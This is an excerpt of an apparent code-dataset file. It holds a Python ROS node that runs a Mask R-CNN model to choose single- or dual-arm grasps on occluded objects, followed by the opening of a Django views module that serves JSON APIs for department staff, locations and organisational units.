DualarmOccludedGraspInstanceSegmentation(ConnectionBasedTransport):\n\n def __init__(self):\n super(self.__class__, self).__init__()\n self.gpu = rospy.get_param('~gpu', -1)\n model_file = rospy.get_param('~model_file')\n\n self.label_names = rospy.get_param('~label_names')\n self.bg_index = rospy.get_param('~bg_index', -1)\n if self.bg_index >= 0:\n bg_label_name = self.label_names[self.bg_index]\n if bg_label_name != '__background__':\n rospy.logerr('bg_label_name is not __background__: {}'\n .format(bg_label_name))\n\n self.sampling = rospy.get_param('~sampling', False)\n self.sampling_weighted = rospy.get_param('~sampling_weighted', False)\n cfgpath = rospy.get_param(\n '~config_yaml', osp.join(filepath, '../yaml/config.yaml'))\n with open(cfgpath, 'r') as f:\n config = easydict.EasyDict(yaml.load(f))\n\n tote_contents = rospy.get_param('~tote_contents', None)\n self.candidates = [self.bg_index]\n if tote_contents is None:\n self.candidates += range(len(self.label_names))\n else:\n self.candidates += [\n self.label_names.index(x) for x in tote_contents]\n self.candidates = sorted(list(set(self.candidates)))\n\n self.giveup_ins_ids = {\n 'single': [],\n 'dual': [],\n }\n\n self.target_grasp = rospy.get_param('~target_grasp', False)\n target_names = rospy.get_param('~target_names', None)\n if self.target_grasp and target_names is None:\n target_names = self.label_names\n self.target_ids = [\n self.label_names.index(x) for x in target_names]\n\n # chainer global config\n chainer.global_config.train = False\n chainer.global_config.enable_backprop = False\n\n # mask rcnn\n if 'rotate_angle' not in config:\n self.rotate_angle = None\n else:\n self.rotate_angle = config.rotate_angle\n self.model = OccludedGraspMaskRCNNResNet101(\n n_fg_class=len(self.label_names),\n anchor_scales=config.anchor_scales,\n min_size=config.min_size,\n max_size=config.max_size,\n rpn_dim=config.rpn_dim,\n rotate_angle=self.rotate_angle)\n chainer.serializers.load_npz(model_file, self.model)\n\n if self.gpu != -1:\n chainer.cuda.get_device_from_id(self.gpu).use()\n self.model.to_gpu()\n\n # input\n self.pub_net_input = self.advertise(\n '~debug/net_input', Image, queue_size=1)\n self.pub_vis_output = self.advertise(\n '~debug/vis_output', Image, queue_size=1)\n # vis\n self.pub_vis_cpi = self.advertise(\n '~output/vis/cluster_indices', ClusterPointIndices, queue_size=1)\n self.pub_vis_labels = self.advertise(\n '~output/vis/labels', LabelArray, queue_size=1)\n self.pub_vis_cls_lbl = self.advertise(\n '~output/vis/cls_label', Image, queue_size=1)\n self.pub_vis_ins_lbl = self.advertise(\n '~output/vis/ins_label', Image, queue_size=1)\n\n # occ\n self.pub_occ_cpi = self.advertise(\n '~output/occ/cluster_indices', ClusterPointIndices, queue_size=1)\n self.pub_occ_labels = self.advertise(\n '~output/occ/labels', LabelArray, queue_size=1)\n self.pub_occ_cls_lbl = self.advertise(\n '~output/occ/cls_label', Image, queue_size=1)\n self.pub_occ_ins_lbl = self.advertise(\n '~output/occ/ins_label', Image, queue_size=1)\n\n # bbox\n self.pub_rects = self.advertise(\n \"~output/rects\", RectArray, queue_size=1)\n\n # class\n self.pub_class = self.advertise(\n \"~output/class\", ClassificationResult,\n queue_size=1)\n\n # single\n self.pub_sg_cpi = self.advertise(\n '~output/single/cluster_indices',\n ClusterPointIndices, queue_size=1)\n self.pub_sg_labels = self.advertise(\n '~output/single/labels', LabelArray, queue_size=1)\n self.pub_sg_cls_lbl = self.advertise(\n '~output/single/cls_label', Image, queue_size=1)\n self.pub_sg_ins_lbl = self.advertise(\n '~output/single/ins_label', Image, queue_size=1)\n\n # dual\n self.pub_dg_cpi = self.advertise(\n '~output/dual/cluster_indices',\n ClusterPointIndices, queue_size=1)\n self.pub_dg_labels = self.advertise(\n '~output/dual/labels', LabelArray, queue_size=1)\n self.pub_dg_cls_lbl = self.advertise(\n '~output/dual/cls_label', Image, queue_size=1)\n self.pub_dg_ins_lbl = self.advertise(\n '~output/dual/ins_label', Image, queue_size=1)\n\n # output\n self.pub_grasp_mask = self.advertise(\n '~output/grasp_mask', Image, queue_size=1)\n self.pub_grasp_class = self.advertise(\n '~output/grasp_class', GraspClassificationResult, queue_size=1)\n\n self.get_another_service = rospy.Service(\n '~get_another', GetAnother, self._get_another)\n self.reset_service = rospy.Service(\n '~reset', Trigger, self._reset)\n self.dyn_srv = Server(\n DualarmOccludedGraspInstanceSegmentationConfig,\n self._dyn_callback)\n\n def subscribe(self):\n # larger buff_size is necessary for taking time callback\n # http://stackoverflow.com/questions/26415699/ros-subscriber-not-up-to-date/29160379#29160379 # NOQA\n queue_size = rospy.get_param('~queue_size', 10)\n self.use_mask = rospy.get_param('~use_mask', True)\n if self.use_mask:\n sub = message_filters.Subscriber(\n '~input', Image, queue_size=1, buff_size=2**24)\n sub_mask = message_filters.Subscriber(\n '~input/mask', Image, queue_size=1, buff_size=2**24)\n self.subs = [sub, sub_mask]\n if rospy.get_param('~approximate_sync', False):\n slop = rospy.get_param('~slop', 0.1)\n sync = message_filters.ApproximateTimeSynchronizer(\n self.subs, queue_size=queue_size, slop=slop)\n else:\n sync = message_filters.TimeSynchronizer(\n self.subs, queue_size=queue_size)\n sync.registerCallback(self._recognize)\n else:\n sub = rospy.Subscriber(\n '~input', Image, callback=self._recognize,\n queue_size=queue_size, buff_size=2**24)\n\n def unsubscribe(self):\n for sub in self.subs:\n sub.unregister()\n\n def _recognize(self, img_msg, mask_msg=None):\n self.model.score_thresh = self.score_thresh\n self.model.nms_thresh = self.nms_thresh\n\n bridge = cv_bridge.CvBridge()\n rgb = bridge.imgmsg_to_cv2(img_msg, desired_encoding='rgb8')\n if self.use_mask:\n if mask_msg is not None:\n mask = bridge.imgmsg_to_cv2(mask_msg)\n # rgb[mask < 128] = self.model.mean.flatten()\n # H, W, C -> C, H, W\n img = rgb.transpose((2, 0, 1))\n results = self.model.predict([img], return_probs=True)\n ins_labels, ins_probs, labels, bboxes, scores = results[:5]\n sg_labels, sg_probs, dg_labels, dg_probs = results[5:]\n try:\n ins_label, ins_prob, label, bbox, score = \\\n ins_labels[0], ins_probs[0], labels[0], bboxes[0], scores[0]\n sg_label, sg_prob, dg_label, dg_prob = \\\n sg_labels[0], sg_probs[0], dg_labels[0], dg_probs[0]\n except IndexError:\n rospy.logerr('no predicts returned')\n return\n\n # matplot\n fig, axes = plt.subplots(\n 1, 5, sharey=True, figsize=(100, 20), dpi=120)\n vis_occluded_grasp_instance_segmentation(\n img, ins_label, label, bbox, score,\n sg_label, dg_label, self.label_names,\n rotate_angle=self.rotate_angle, axes=axes,\n linewidth=5.0, fontsize=30)\n fig.canvas.draw()\n w, h = fig.canvas.get_width_height()\n vis_output_img = np.fromstring(\n fig.canvas.tostring_rgb(), dtype=np.uint8)\n fig.clf()\n vis_output_img.shape = (h, w, 3)\n plt.close()\n vis_output_msg = bridge.cv2_to_imgmsg(\n vis_output_img, encoding='rgb8')\n vis_output_msg.header = img_msg.header\n\n # msg\n # input\n net_input_msg = bridge.cv2_to_imgmsg(\n rgb.astype(np.uint8), encoding='rgb8')\n net_input_msg.header = img_msg.header\n\n # vis lbls\n vis_cpi_msg = ClusterPointIndices(header=img_msg.header)\n vis_labels_msg = LabelArray(header=img_msg.header)\n vis_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n vis_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n vis_ins_n_pixel = []\n\n # occ lbls\n occ_cpi_msg = ClusterPointIndices(header=img_msg.header)\n occ_labels_msg = LabelArray(header=img_msg.header)\n occ_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n occ_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n occ_ins_n_pixel = []\n\n if len(label) == 0 or len(ins_label) == 0:\n return\n\n for ins_id, (cls_id, ins_lbl) in enumerate(zip(label, ins_label)):\n # vis region\n if self.use_mask:\n vis_msk = np.logical_and(ins_lbl == 1, mask > 128)\n else:\n vis_msk = ins_lbl == 1\n vis_ins_n_pixel.append(vis_msk.sum())\n\n # occ region\n if self.use_mask:\n occ_msk = np.logical_and(ins_lbl == 2, mask > 128)\n else:\n occ_msk = ins_lbl == 2\n occ_ins_n_pixel.append(occ_msk.sum())\n\n if cls_id not in self.candidates:\n continue\n\n # vis region\n class_name = self.label_names[cls_id]\n vis_indices = np.where(vis_msk.flatten())[0]\n vis_indices_msg = PointIndices(\n header=img_msg.header, indices=vis_indices)\n vis_cpi_msg.cluster_indices.append(vis_indices_msg)\n vis_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n vis_cls_lbl[vis_msk] = cls_id\n vis_ins_lbl[vis_msk] = ins_id\n\n # occ region\n occ_indices = np.where(occ_msk.flatten())[0]\n occ_indices_msg = PointIndices(\n header=img_msg.header, indices=occ_indices)\n occ_cpi_msg.cluster_indices.append(occ_indices_msg)\n occ_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n occ_cls_lbl[occ_msk] = cls_id\n occ_ins_lbl[occ_msk] = ins_id\n\n vis_cls_lbl_msg = bridge.cv2_to_imgmsg(vis_cls_lbl)\n vis_cls_lbl_msg.header = img_msg.header\n vis_ins_lbl_msg = bridge.cv2_to_imgmsg(vis_ins_lbl)\n vis_ins_lbl_msg.header = img_msg.header\n vis_ins_n_pixel = np.array(vis_ins_n_pixel, dtype=np.int32)\n\n occ_cls_lbl_msg = bridge.cv2_to_imgmsg(occ_cls_lbl)\n occ_cls_lbl_msg.header = img_msg.header\n occ_ins_lbl_msg = bridge.cv2_to_imgmsg(occ_ins_lbl)\n occ_ins_lbl_msg.header = img_msg.header\n occ_ins_n_pixel = np.array(occ_ins_n_pixel, dtype=np.int32)\n\n # bbox\n rects_msg = RectArray(header=img_msg.header)\n for bb in bbox:\n rect = Rect(x=bb[1], y=bb[0],\n width=bb[3] - bb[1],\n height=bb[2] - bb[0])\n rects_msg.rects.append(rect)\n\n # classification\n cls_msg = ClassificationResult(\n header=img_msg.header,\n classifier='OccludedGraspMaskRCNNResNet101',\n target_names=self.label_names,\n labels=label,\n label_names=[self.label_names[lbl] for lbl in label],\n label_proba=score,\n )\n\n # sg, dg\n sg_cpi_msg = ClusterPointIndices(header=img_msg.header)\n sg_labels_msg = LabelArray(header=img_msg.header)\n sg_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n sg_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n dg_cpi_msg = ClusterPointIndices(header=img_msg.header)\n dg_labels_msg = LabelArray(header=img_msg.header)\n dg_cls_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n dg_ins_lbl = - np.ones(img.shape[1:], dtype=np.int32)\n\n for ins_id, (cls_id, sg_lbl, dg_lbl) in enumerate(\n zip(label, sg_label, dg_label)):\n if cls_id not in self.candidates:\n continue\n class_name = self.label_names[cls_id]\n\n # sg\n if self.use_mask:\n sg_msk = np.logical_and(sg_lbl > 0, mask > 128)\n else:\n sg_msk = sg_lbl > 0\n sg_indices = np.where(sg_msk.flatten())[0]\n sg_indices_msg = PointIndices(\n header=img_msg.header, indices=sg_indices)\n sg_cpi_msg.cluster_indices.append(sg_indices_msg)\n sg_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n sg_cls_lbl[sg_msk] = cls_id\n sg_ins_lbl[sg_msk] = ins_id\n\n # dg\n if self.use_mask:\n dg_msk = np.logical_and(dg_lbl > 0, mask > 128)\n else:\n dg_msk = dg_lbl > 0\n dg_indices = np.where(dg_msk.flatten())[0]\n dg_indices_msg = PointIndices(\n header=img_msg.header, indices=dg_indices)\n dg_cpi_msg.cluster_indices.append(dg_indices_msg)\n dg_labels_msg.labels.append(\n Label(id=cls_id, name=class_name))\n dg_cls_lbl[dg_msk] = cls_id\n dg_ins_lbl[dg_msk] = ins_id\n\n sg_cls_lbl_msg = bridge.cv2_to_imgmsg(sg_cls_lbl)\n sg_cls_lbl_msg.header = img_msg.header\n sg_ins_lbl_msg = bridge.cv2_to_imgmsg(sg_ins_lbl)\n sg_ins_lbl_msg.header = img_msg.header\n dg_cls_lbl_msg = bridge.cv2_to_imgmsg(dg_cls_lbl)\n dg_cls_lbl_msg.header = img_msg.header\n dg_ins_lbl_msg = bridge.cv2_to_imgmsg(dg_ins_lbl)\n dg_ins_lbl_msg.header = img_msg.header\n\n sg_ins_prob_img = ins_prob[:, 1, :, :] * \\\n np.sum(sg_prob[:, 1:, :, :], axis=1)\n if self.use_mask:\n sg_ins_prob_mask = np.repeat(\n (mask <= 128)[None], len(sg_ins_prob_img), axis=0)\n sg_ins_prob_img[sg_ins_prob_mask] = 0\n sg_ins_prob = np.max(sg_ins_prob_img, axis=(1, 2))\n assert len(sg_ins_prob) == len(sg_prob)\n assert sg_ins_prob.ndim == 1\n\n dg_ins_prob_img = ins_prob[:, 1, :, :] * \\\n np.sum(dg_prob[:, 1:, :, :], axis=1)\n if self.use_mask:\n dg_ins_prob_mask = np.repeat(\n (mask <= 128)[None], len(dg_ins_prob_img), axis=0)\n dg_ins_prob_img[dg_ins_prob_mask] = 0\n dg_ins_prob = np.max(dg_ins_prob_img, axis=(1, 2))\n assert len(dg_ins_prob) == len(dg_prob)\n assert dg_ins_prob.ndim == 1\n\n # grasp mask and style\n if self.sampling:\n if len(self.candidates) != 2:\n rospy.logerr('Invalid tote contents num: {}'.format(\n self.candidates))\n grasp_style = self.grasping_way\n if self.candidates[1] in label:\n grasp_cls_ids = [self.candidates[1]]\n if grasp_style == 'single':\n grasp_probs = sg_ins_prob[label == grasp_cls_ids[0]][0:1]\n grasp_mask = self._random_sample_sg_mask(\n sg_cls_lbl == grasp_cls_ids[0],\n vis_cls_lbl == grasp_cls_ids[0])\n else:\n grasp_probs = dg_ins_prob[label == grasp_cls_ids[0]][0:1]\n grasp_mask = self._random_sample_dg_mask(\n dg_cls_lbl == grasp_cls_ids[0],\n vis_cls_lbl == grasp_cls_ids[0])\n else:\n grasp_cls_ids = []\n grasp_probs = []\n grasp_mask = np.zeros(img.shape[1:], dtype=np.uint8)\n is_target = True\n else:\n sg_ins_prob[sg_ins_prob <= self.grasp_thresh] = 0\n dg_ins_prob[dg_ins_prob <= self.grasp_thresh] = 0\n vis_ratio = vis_ins_n_pixel / (vis_ins_n_pixel + occ_ins_n_pixel)\n vis_ratio[np.isnan(vis_ratio)] = 0\n target_ins_ids = []\n if self.target_grasp:\n for ins_id in range(len(vis_ratio)):\n if (label[ins_id] in self.target_ids and\n (sg_ins_prob[ins_id] > 0 or\n dg_ins_prob[ins_id] > 0)):\n target_ins_ids.append(ins_id)\n target_ins_ids = np.array(target_ins_ids, dtype=np.int32)\n\n if self.target_grasp and len(target_ins_ids) > 0:\n target_sg_ins_prob = sg_ins_prob[target_ins_ids]\n target_dg_ins_prob = dg_ins_prob[target_ins_ids]\n\n sg_ins_prob_max = target_sg_ins_prob.max()\n dg_ins_prob_max = target_dg_ins_prob.max()\n sg_ins_id = target_ins_ids[target_sg_ins_prob.argmax()]\n dg_ins_id = target_ins_ids[target_dg_ins_prob.argmax()]\n\n # either of sg, dg are graspable\n if vis_ratio[sg_ins_id] > self.vis_thresh \\\n or vis_ratio[dg_ins_id] > self.vis_thresh:\n # both of sg, dg are graspable\n if vis_ratio[sg_ins_id] > self.vis_thresh \\\n and vis_ratio[dg_ins_id] > self.vis_thresh:\n if sg_ins_prob_max > dg_ins_prob_max:\n grasp_style = 'single'\n else:\n grasp_style = 'dual'\n # sg is grapable, but dg is not\n elif vis_ratio[sg_ins_id] > self.vis_thresh:\n grasp_style = 'single'\n # dg is grapable, but sg is not\n else:\n grasp_style = 'dual'\n\n if grasp_style == 'single':\n grasp_ins_ids = [sg_ins_id]\n grasp_probs = [sg_ins_prob_max]\n grasp_mask = \\\n sg_ins_prob_img[sg_ins_id] > self.grasp_thresh\n else:\n grasp_ins_ids = [dg_ins_id]\n grasp_probs = [dg_ins_prob_max]\n grasp_mask = \\\n dg_ins_prob_img[dg_ins_id] > self.grasp_thresh\n # none of sg, dg are graspable\n else:\n if sg_ins_prob_max > dg_ins_prob_max:\n occ_ins_id = self._find_occ_top(\n sg_ins_id, ins_label, label)\n else:\n occ_ins_id = self._find_occ_top(\n dg_ins_id, ins_label, label)\n\n if sg_ins_prob[occ_ins_id] > dg_ins_prob[occ_ins_id]:\n grasp_style = 'single'\n grasp_ins_ids = [occ_ins_id]\n grasp_probs = [sg_ins_prob[occ_ins_id]]\n grasp_mask = \\\n sg_ins_prob_img[occ_ins_id] > self.grasp_thresh\n else:\n grasp_style = 'dual'\n grasp_ins_ids = [occ_ins_id]\n grasp_probs = [dg_ins_prob[occ_ins_id]]\n grasp_mask = \\\n dg_ins_prob_img[occ_ins_id] > self.grasp_thresh\n else:\n sg_ins_prob[vis_ratio <= self.vis_thresh] = 0\n dg_ins_prob[vis_ratio <= self.vis_thresh] = 0\n is_candidates = np.array(\n [lbl in self.candidates for lbl in label], dtype=np.bool)\n sg_ins_prob[~is_candidates] = 0\n dg_ins_prob[~is_candidates] = 0\n sg_ins_prob_max = sg_ins_prob.max()\n dg_ins_prob_max = dg_ins_prob.max()\n\n if sg_ins_prob_max > dg_ins_prob_max:\n grasp_style = 'single'\n grasp_ins_ids = [np.argmax(sg_ins_prob)]\n grasp_probs = [sg_ins_prob_max]\n if label[grasp_ins_ids[0]] in self.candidates:\n grasp_mask = sg_ins_prob_img[\n grasp_ins_ids[0]] > self.grasp_thresh\n else:\n grasp_mask = np.zeros(img.shape[1:], dtype=np.uint8)\n else:\n grasp_style = 'dual'\n grasp_ins_ids = [np.argmax(dg_ins_prob)]\n grasp_probs = [dg_ins_prob_max]\n if label[grasp_ins_ids[0]] in self.candidates:\n grasp_mask = dg_ins_prob_img[\n grasp_ins_ids[0]] > self.grasp_thresh\n else:\n grasp_mask = np.zeros(img.shape[1:], dtype=np.uint8)\n\n grasp_mask = grasp_mask.astype(np.uint8) * 255\n grasp_cls_ids = [\n label[grasp_ins_id] for grasp_ins_id in grasp_ins_ids]\n if self.target_grasp:\n is_target = grasp_cls_ids[0] in self.target_ids\n else:\n is_target = True\n\n grasp_mask_msg = bridge.cv2_to_imgmsg(grasp_mask, encoding='mono8')\n grasp_mask_msg.header = img_msg.header\n\n grasp_label_names = []\n for grasp_cls_id in grasp_cls_ids:\n if grasp_cls_id >= 0:\n grasp_label_names.append(self.label_names[grasp_cls_id])\n else:\n grasp_label_names.append('__background__')\n\n grasp_cls_msg = GraspClassificationResult(\n header=img_msg.header,\n style=grasp_style,\n is_target=is_target,\n classification=ClassificationResult(\n header=img_msg.header,\n labels=grasp_cls_ids,\n label_names=grasp_label_names,\n label_proba=grasp_probs,\n classifier='OccludedGraspMaskRCNNResNet101',\n target_names=self.label_names))\n\n # publish\n # input\n self.pub_net_input.publish(net_input_msg)\n self.pub_vis_output.publish(vis_output_msg)\n\n # vis\n self.pub_vis_cpi.publish(vis_cpi_msg)\n self.pub_vis_labels.publish(vis_labels_msg)\n self.pub_vis_cls_lbl.publish(vis_cls_lbl_msg)\n self.pub_vis_ins_lbl.publish(vis_ins_lbl_msg)\n\n # occ\n self.pub_occ_cpi.publish(occ_cpi_msg)\n self.pub_occ_labels.publish(occ_labels_msg)\n self.pub_occ_cls_lbl.publish(occ_cls_lbl_msg)\n self.pub_occ_ins_lbl.publish(occ_ins_lbl_msg)\n\n # bbox\n self.pub_rects.publish(rects_msg)\n\n # class\n self.pub_class.publish(cls_msg)\n\n # sg\n self.pub_sg_cpi.publish(sg_cpi_msg)\n self.pub_sg_labels.publish(sg_labels_msg)\n self.pub_sg_cls_lbl.publish(sg_cls_lbl_msg)\n self.pub_sg_ins_lbl.publish(sg_ins_lbl_msg)\n\n # dg\n self.pub_dg_cpi.publish(dg_cpi_msg)\n self.pub_dg_labels.publish(dg_labels_msg)\n self.pub_dg_cls_lbl.publish(dg_cls_lbl_msg)\n self.pub_dg_ins_lbl.publish(dg_ins_lbl_msg)\n\n self.pub_grasp_mask.publish(grasp_mask_msg)\n self.pub_grasp_class.publish(grasp_cls_msg)\n # time.sleep(1.0)\n\n def _random_sample_sg_mask(self, sg_prb, label_msk):\n weight = sg_prb\n weight[~label_msk] = 0.0\n if self.sampling_weighted and np.sum(weight) > 0:\n weight = weight.ravel() / np.sum(weight)\n elif np.sum(label_msk) > 0:\n label_msk = label_msk.astype(np.float32)\n weight = label_msk.ravel() / np.sum(label_msk)\n else:\n weight = None\n sample_grasp = np.zeros(sg_prb.shape)\n sampled_i = np.random.choice(sg_prb.size, p=weight)\n sampled_index = (\n sampled_i // sg_prb.shape[1],\n sampled_i % sg_prb.shape[1],\n )\n sample_grasp[sampled_index] = 255\n sample_grasp = scipy.ndimage.filters.gaussian_filter(\n sample_grasp, sigma=20)\n sample_grasp = sample_grasp / sample_grasp.max()\n sample_mask = sample_grasp > self.sampling_thresh\n sample_mask = sample_mask.astype(np.uint8) * 255\n return sample_mask\n\n def _random_sample_dg_mask(self, dg_prb, label_msk):\n indices = np.column_stack(np.where(label_msk))\n\n c_masks = []\n if indices.size > 1:\n kmeans = KMeans(n_clusters=2)\n try:\n kmeans.fit(indices)\n centers = kmeans.cluster_centers_\n labels = kmeans.labels_\n for label, center in enumerate(centers):\n center = np.round(center).astype(np.int32)\n c_mask = np.zeros(label_msk.shape).astype(bool)\n masked_indices = indices[labels == label]\n masked_indices = (\n masked_indices[:, 0], masked_indices[:, 1])\n c_mask[masked_indices] = True\n weight = dg_prb.copy()\n weight[~c_mask] = 0.0\n if self.sampling_weighted and np.sum(weight) > 0:\n weight = weight.ravel() / np.sum(weight)\n elif np.sum(label_msk) > 0:\n label_msk = label_msk.astype(np.float32)\n weight = label_msk.ravel() / np.sum(label_msk)\n else:\n weight = None\n dual_giveup = False\n trial_num = 10\n for i in range(0, trial_num):\n sampled_i = np.random.choice(dg_prb.size, p=weight)\n sampled_index = (\n sampled_i // dg_prb.shape[1],\n sampled_i % dg_prb.shape[1],\n )\n c_grasp = np.zeros(dg_prb.shape)\n c_grasp[sampled_index] = 255\n c_grasp = scipy.ndimage.filters.gaussian_filter(\n c_grasp, sigma=20)\n c_grasp = c_grasp / c_grasp.max()\n c_mask = c_grasp > self.sampling_thresh\n if len(c_masks) > 0:\n if not np.any(np.logical_and(c_mask, c_masks[0])):\n c_masks.append(c_mask)\n break\n else:\n c_masks.append(c_mask)\n break\n if i == trial_num - 1:\n dual_giveup = True\n except Exception:\n dual_giveup = True\n if len(c_masks) == 2 and dual_giveup is False:\n sample_mask = np.logical_or(c_masks[0], c_masks[1])\n sample_mask = sample_mask.astype(np.uint8) * 255\n else:\n sample_mask = np.zeros(dg_prb.shape, dtype=np.uint8)\n\n return sample_mask\n\n def _find_occ_top(self, target_ins_id, ins_label, label):\n checked_ids = set()\n checked_ids.add(target_ins_id)\n vis_msk = ins_label[target_ins_id] == 1\n vis_rto = vis_msk.sum() / (ins_label[target_ins_id] > 0).sum()\n if vis_rto > self.vis_thresh:\n rospy.loginfo(\n '{}_{} is not occluded but graspable!'\n .format(self.label_names[label[target_ins_id]], target_ins_id))\n return target_ins_id\n ret_ins_id = None\n for ins_id, ins_lbl in enumerate(ins_label):\n if ins_id in checked_ids:\n continue\n else:\n occ_msk = ins_label[target_ins_id] == 2\n occ_msk_by_this = np.logical_and(ins_lbl == 1, occ_msk)\n occ_rto = occ_msk_by_this.sum() / occ_msk.sum()\n if occ_rto > 0.1:\n rospy.loginfo(\n '{}_{} is occluded by {}_{}'\n .format(self.label_names[label[target_ins_id]],\n target_ins_id,\n self.label_names[label[ins_id]], ins_id))\n ret_ins_id = self._find_occ_top_step(\n ins_id, ins_label, label, checked_ids)\n if ret_ins_id is not None:\n break\n if ret_ins_id is None:\n return target_ins_id\n else:\n return ret_ins_id\n\n def _find_occ_top_step(self, target_ins_id, ins_label, label, checked_ids):\n checked_ids.add(target_ins_id)\n vis_msk = ins_label[target_ins_id] == 1\n vis_rto = vis_msk.sum() / (ins_label[target_ins_id] > 0).sum()\n if vis_rto > self.vis_thresh:\n rospy.loginfo(\n '{}_{} is not occluded but graspable!'\n .format(self.label_names[label[target_ins_id]], target_ins_id))\n return target_ins_id\n ret_ins_id = None\n for ins_id, ins_lbl in enumerate(ins_label):\n if ins_id in checked_ids:\n continue\n else:\n occ_msk = ins_label[target_ins_id] == 2\n occ_msk_by_this = np.logical_and(ins_lbl == 1, occ_msk)\n occ_rto = occ_msk_by_this.sum() / occ_msk.sum()\n if occ_rto > 0.1:\n rospy.loginfo(\n '{}_{} is occluded by {}_{}'\n .format(self.label_names[label[target_ins_id]],\n target_ins_id,\n self.label_names[label[ins_id]], ins_id))\n ret_ins_id = self._find_occ_top_step(\n ins_id, ins_label, label, checked_ids)\n if ret_ins_id is not None:\n break\n return ret_ins_id\n\n def _get_another(self, req):\n grasp_style = req.style\n label = req.label\n self.giveup_ins_ids[grasp_style].append(label)\n response = GetAnotherResponse()\n response.success = True\n return response\n\n def _reset(self, req):\n self.giveup_ins_ids = {\n 'single': [],\n 'dual': [],\n }\n response = TriggerResponse()\n response.success = True\n return response\n\n def _dyn_callback(self, config, level):\n self.score_thresh = config.score_thresh\n self.grasp_thresh = config.grasp_thresh\n self.nms_thresh = config.nms_thresh\n self.vis_thresh = config.vis_thresh\n self.sampling_thresh = config.sampling_thresh\n self.grasping_way = config.grasping_way\n return config\n\n\nif __name__ == '__main__':\n rospy.init_node('dualarm_occluded_grasp_instance_segmentation')\n node = DualarmOccludedGraspInstanceSegmentation()\n rospy.spin()\n","sub_path":"demos/selective_dualarm_grasping/node_scripts/dualarm_occluded_grasp_instance_segmentation.py","file_name":"dualarm_occluded_grasp_instance_segmentation.py","file_ext":"py","file_size_in_byte":32542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"173638792","text":"from basicauth.decorators import basic_auth_required\nfrom datetime import date, datetime\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import Group\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, JsonResponse\nfrom django.db.models import Q\nfrom django.urls import reverse\nfrom django.utils import timezone\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import View, ListView, DetailView, UpdateView, FormView, TemplateView\nfrom itassets.utils import breadcrumbs_list\n\nfrom .forms import ConfirmPhoneNosForm\nfrom .models import DepartmentUser, Location, OrgUnit, ADAction\nfrom .reports import department_user_export, user_account_export, department_user_ascender_discrepancies\n\n\nclass AddressBook(TemplateView):\n template_name = 'organisation/address_book.html'\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass DepartmentUserAPIResource(View):\n \"\"\"An API view that returns JSON of active department staff accounts.\n \"\"\"\n def get(self, request, *args, **kwargs):\n queryset = DepartmentUser.objects.filter(\n **DepartmentUser.ACTIVE_FILTER\n ).exclude(\n account_type__in=DepartmentUser.ACCOUNT_TYPE_EXCLUDE\n ).prefetch_related(\n 'location',\n 'org_unit',\n ).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on email.\n queryset = queryset.filter(email__icontains=self.request.GET['q'])\n\n if 'selectlist' in request.GET: # Smaller response, for use in HTML select lists.\n users = {'objects': [{'id': user.pk, 'text': user.email} for user in queryset]}\n else: # Normal API response.\n users = [\n {\n 'id': user.pk,\n 'name': user.name,\n 'preferred_name': user.preferred_name if user.preferred_name else None,\n 'email': user.email,\n 'title': user.title if user.title else None,\n 'telephone': user.telephone if user.telephone else None,\n 'extension': user.extension if user.extension else None,\n 'mobile_phone': user.mobile_phone if user.mobile_phone else None,\n 'location': {'id': user.location.pk, 'name': user.location.name} if user.location else {},\n 'org_unit': {'id': user.org_unit.pk, 'name': user.org_unit.name, 'acronym': user.org_unit.acronym} if user.org_unit else {},\n 'group_unit': {'id': user.group_unit.pk, 'name': user.group_unit.name, 'acronym': user.group_unit.acronym} if user.group_unit else {},\n 'cost_centre': user.cost_centre.code if user.cost_centre else None,\n 'employee_id': user.employee_id if user.employee_id else None, # NOTE: employee ID is used in the Moodle employee sync process.\n } for user in queryset\n ]\n\n return JsonResponse(users, safe=False)\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass LocationAPIResource(View):\n \"\"\"An API view that returns JSON of active physical locations.\n \"\"\"\n def get(self, request, *args, **kwargs):\n queryset = Location.objects.filter(active=True).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on name.\n queryset = queryset.filter(name__icontains=self.request.GET['q'])\n\n if 'selectlist' in request.GET: # Smaller response, for use in HTML select lists.\n locations = {'objects': [{'id': location.pk, 'text': location.name} for location in queryset]}\n else:\n locations = [\n {\n 'id': location.pk,\n 'name': location.name,\n 'point': {'type': 'Point', 'coordinates': location.point.coords} if location.point else {},\n 'address': location.address,\n 'pobox': location.pobox,\n 'phone': location.phone,\n 'fax': location.fax,\n } for location in queryset\n ]\n\n return JsonResponse(locations, safe=False)\n\n\n@method_decorator(basic_auth_required(target_test=lambda request: not request.user.is_authenticated), name='dispatch')\nclass OrgUnitAPIResource(View):\n \"\"\"An API view that returns JSON of active organisation units.\n \"\"\"\n def get(self, request, *args, **kwargs):\n queryset = OrgUnit.objects.filter(active=True).order_by('name')\n\n if 'q' in self.request.GET: # Allow basic filtering on name.\n queryset = queryset.filter(name__icontains=self.request.GET['q'])\n if 'division' in self.request.GET: # Allow filtering to divisions only.\n queryset = queryset.filter(unit_type=1)\n if 'division_id' in self.request.GET and self.request.GET['division_id']: # Allow filtering to org units belonging to a division.\n queryset = queryset.filter(division_unit__pk=self.request.GET['division_id'])\n\n if 'selectlist' in request.GET: # Smaller response, for use in HTML select lists.\n org_units = {'objects': [{'id': ou.pk, 'text': ou.name} for ou in queryset]}\n else:\n org_units = [\n {\n 'id': ou.pk,\n 'name': ou.name,\n 'division_id': ou.division_unit.pk if ou.division_unit else None,\n } for ou in queryset\n 